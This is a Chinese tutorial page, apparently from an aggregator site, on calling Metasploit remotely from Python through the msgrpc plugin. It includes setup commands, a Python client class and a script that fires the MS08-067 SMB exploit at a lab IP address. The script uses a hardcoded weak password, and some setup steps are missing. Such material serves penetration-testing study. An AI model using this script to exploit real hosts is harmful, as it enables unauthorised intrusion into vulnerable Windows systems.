Python 远程调用MetaSploit |
您所在的位置:网站首页 › python调用metasploit进行攻击 › Python 远程调用MetaSploit |
(1)安装Python的msgpack类库。MSF官方文档中的数据序列化标准就是參照msgpack。 root@kali:~# apt-get install python-setuptools root@kali:~# easy_install msgpack-python
(2)创建createdb_sql.txt: create database msf; create user msf with password 'msf123'; grant all privileges on database msf to msf;
(3)在PostgreSQL 运行上述文件: root@kali:~# /etc/init.d/postgresql start root@kali:~# sudo -u postgres /usr/bin/psql db_connect msf:[email protected]/msf [*] Rebuilding the module cache in the background... resource (setup.rc)> load msgrpc User=msf Pass='abc123' [*] MSGRPC Service: 127.0.0.1:55552 [*] MSGRPC Username: msf [*] MSGRPC Password: abc123 [*] Successfully loaded plugin: msgrpc
(6)Github上有一个Python的类库,只是非常不好用 root@kali:~# git clone git://github.com/SpiderLabs/msfrpc.git msfrpc root@kali:~# cd msfrpc/python-msfrpc root@kali:~# python setup.py install 測试代码: #!/usr/bin/env python import msgpack import httplib
class Msfrpc: class MsfError(Exception): def __init__(self,msg): self.msg = msg def __str__(self): return repr(self.msg)
class MsfAuthError(MsfError): def __init__(self,msg): self.msg = msg
def __init__(self,opts=[]): self.host = opts.get('host') or "127.0.0.1" self.port = opts.get('port') or 55552 self.uri = opts.get('uri') or "/api/" self.ssl = opts.get('ssl') or False self.authenticated = False self.token = False self.headers = {"Content-type" : "binary/message-pack" } if self.ssl: self.client = httplib.HTTPSConnection(self.host,self.port) else: self.client = httplib.HTTPConnection(self.host,self.port)
def encode(self,data): return msgpack.packb(data) def decode(self,data): return msgpack.unpackb(data)
def call(self,meth,opts = []): if meth != "auth.login": if not self.authenticated: raise self.MsfAuthError("MsfRPC: Not Authenticated")
if meth != "auth.login": opts.insert(0,self.token)
opts.insert(0,meth) params = self.encode(opts) self.client.request("POST",self.uri,params,self.headers) resp = self.client.getresponse() return self.decode(resp.read())
def login(self,user,password): ret = self.call('auth.login',[user,password]) if ret.get('result') == 'success': self.authenticated = True self.token = ret.get('token') return True else: raise self.MsfAuthError("MsfRPC: Authentication failed")
if __name__ == '__main__':
# Create a new instance of the Msfrpc client with the default options client = Msfrpc({})
# Login to the msfmsg server using the password "abc123" client.login('msf','abc123')
# Get a list of the exploits from the server mod = client.call('module.exploits')
# Grab the first item from the modules value of the returned dict print "Compatible payloads for : %s\n" % mod['modules'][0]
# Get the list of compatible payloads for the first option ret = client.call('module.compatible_payloads',[mod['modules'][0]]) for i in (ret.get('payloads')): print "\t%s" % i Console方式调用Ms08067漏洞if __name__ == '__main__': # Create a new instance of the Msfrpc client with the default options client = Msfrpc({}) # Login to the msfmsg server using the password "abc123" client.login('msf','abc123') try: res = client.call('console.create') console_id = res['id'] except: print "Console create failed\r\n" sys.exit() host_list = '192.168.7.135' cmd = """use exploit/windows/smb/ms08_067_netapi set RHOST 192.168.7.135 exploit """ client.call('console.write',[console_id,cmd]) time.sleep(1) while True: res = client.call('console.read',[console_id]) if len(res['data']) > 1: print res['data'], if res['busy'] == True: time.sleep(1) continue break client.call('console.destroy',[console_id]) |
今日新闻 |
点击排行 |
|
推荐新闻 |
图片新闻 |
|
专题文章 |
CopyRight 2018-2019 实验室设备网 版权所有 win10的实时保护怎么永久关闭 |